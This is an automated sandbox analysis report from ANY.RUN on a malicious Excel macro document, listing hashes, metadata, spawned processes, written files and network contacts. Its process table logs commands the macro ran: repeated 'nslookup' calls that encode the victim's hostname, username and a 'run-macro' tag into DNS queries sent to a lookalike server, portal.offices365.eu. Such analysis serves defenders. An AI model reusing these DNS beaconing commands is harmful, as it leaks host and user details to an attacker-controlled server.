File name: | 2a07f8bae7882c42b0c99975df251cf7c05d5a4b4fe6678cd55c84ce0b83edda.xls |
Full analysis: | https://app.any.run/tasks/a1761359-5238-473b-9d96-821d4fe1e5ad |
Verdict: | Malicious activity |
Analysis date: | May 15, 2019, 01:25:34 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.spreadsheetml.sheet |
File info: | Microsoft Excel 2007+ |
MD5: | F552BC297253AA7D59548758DA6C7025 |
SHA1: | 3209272D852497198499141AF0D3CEEB77100768 |
SHA256: | 2A07F8BAE7882C42B0C99975DF251CF7C05D5A4B4FE6678CD55C84CE0B83EDDA |
SSDEEP: | 768:MOChhPQduBz1Eqo5U3tMn2FK9JDl6KWfKHGvWBsjFqUAHOQVVxhfqjs6W:MZhOduBzqq2U3tM2iDYJSGwgFqzH9hqY |
.xlam | | | Excel Macro-enabled Open XML add-in (42.4) |
---|---|---|
.xlsm | | | Excel Microsoft Office Open XML Format document (with Macro) (29.2) |
.xlsx | | | Excel Microsoft Office Open XML Format document (17.3) |
.zip | | | Open Packaging Conventions container (8.9) |
.zip | | | ZIP compressed archive (2) |
AppVersion: | 16.03 |
---|---|
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
Company: | - |
TitlesOfParts: |
|
HeadingPairs: |
|
ScaleCrop: | No |
DocSecurity: | None |
Application: | Microsoft Excel |
ModifyDate: | 2019:05:13 19:16:02Z |
CreateDate: | 2015:06:05 18:19:34Z |
LastModifiedBy: | Daniel Hejda |
Creator: | Daniel Hejda |
---|
ZipFileName: | [Content_Types].xml |
---|---|
ZipUncompressedSize: | 1996 |
ZipCompressedSize: | 486 |
ZipCRC: | 0xfaada595 |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0006 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3328 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
3956 | CMD.exe /c nslookup USER-PC.promedcscom.onmicrosoft.com portal.offices365.eu | C:\Windows\system32\CMD.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2364 | CMD.exe /c nslookup admin.promedcscom.onmicrosoft.com portal.offices365.eu | C:\Windows\system32\CMD.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1712 | CMD.exe /c nslookup .promedcscom.onmicrosoft.com portal.offices365.eu | C:\Windows\system32\CMD.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
128 | CMD.exe /c nslookup USER-PC.promedcscom.onmicrosoft.com portal.offices365.eu | C:\Windows\system32\CMD.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1012 | nslookup admin.promedcscom.onmicrosoft.com portal.offices365.eu | C:\Windows\system32\nslookup.exe | CMD.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: nslookup Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2308 | nslookup USER-PC.promedcscom.onmicrosoft.com portal.offices365.eu | C:\Windows\system32\nslookup.exe | CMD.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: nslookup Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2244 | nslookup USER-PC.promedcscom.onmicrosoft.com portal.offices365.eu | C:\Windows\system32\nslookup.exe | CMD.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: nslookup Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1564 | nslookup .promedcscom.onmicrosoft.com portal.offices365.eu | C:\Windows\system32\nslookup.exe | CMD.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: nslookup Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3912 | CMD.exe /c nslookup admin-run-macro.promedcscom.onmicrosoft.com portal.offices365.eu | C:\Windows\system32\CMD.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3328 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVREE83.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3328 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\Excel8.0\MSForms.exd | tlb | |
MD5:167CA8C268478495E76CD4A60F0DD125 | SHA256:69235C2681D65BF88F4C37AA40A04B2DA1490957EC8650F3BD78C1E69D749AE7 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1564 | nslookup.exe | 51.144.73.213:53 | portal.offices365.eu | Microsoft Corporation | NL | unknown |
1012 | nslookup.exe | 51.144.73.213:53 | portal.offices365.eu | Microsoft Corporation | NL | unknown |
2308 | nslookup.exe | 51.144.73.213:53 | portal.offices365.eu | Microsoft Corporation | NL | unknown |
2244 | nslookup.exe | 51.144.73.213:53 | portal.offices365.eu | Microsoft Corporation | NL | unknown |
1812 | nslookup.exe | 51.144.73.213:53 | portal.offices365.eu | Microsoft Corporation | NL | unknown |
— | — | 51.144.73.213:53 | portal.offices365.eu | Microsoft Corporation | NL | unknown |
Domain | IP | Reputation |
---|---|---|
portal.offices365.eu |
| unknown |
213.73.144.51.in-addr.arpa |
| unknown |
admin.promedcscom.onmicrosoft.com |
| unknown |
USER-PC.promedcscom.onmicrosoft.com |
| whitelisted |
admin-run-macro.promedcscom.onmicrosoft.com |
| unknown |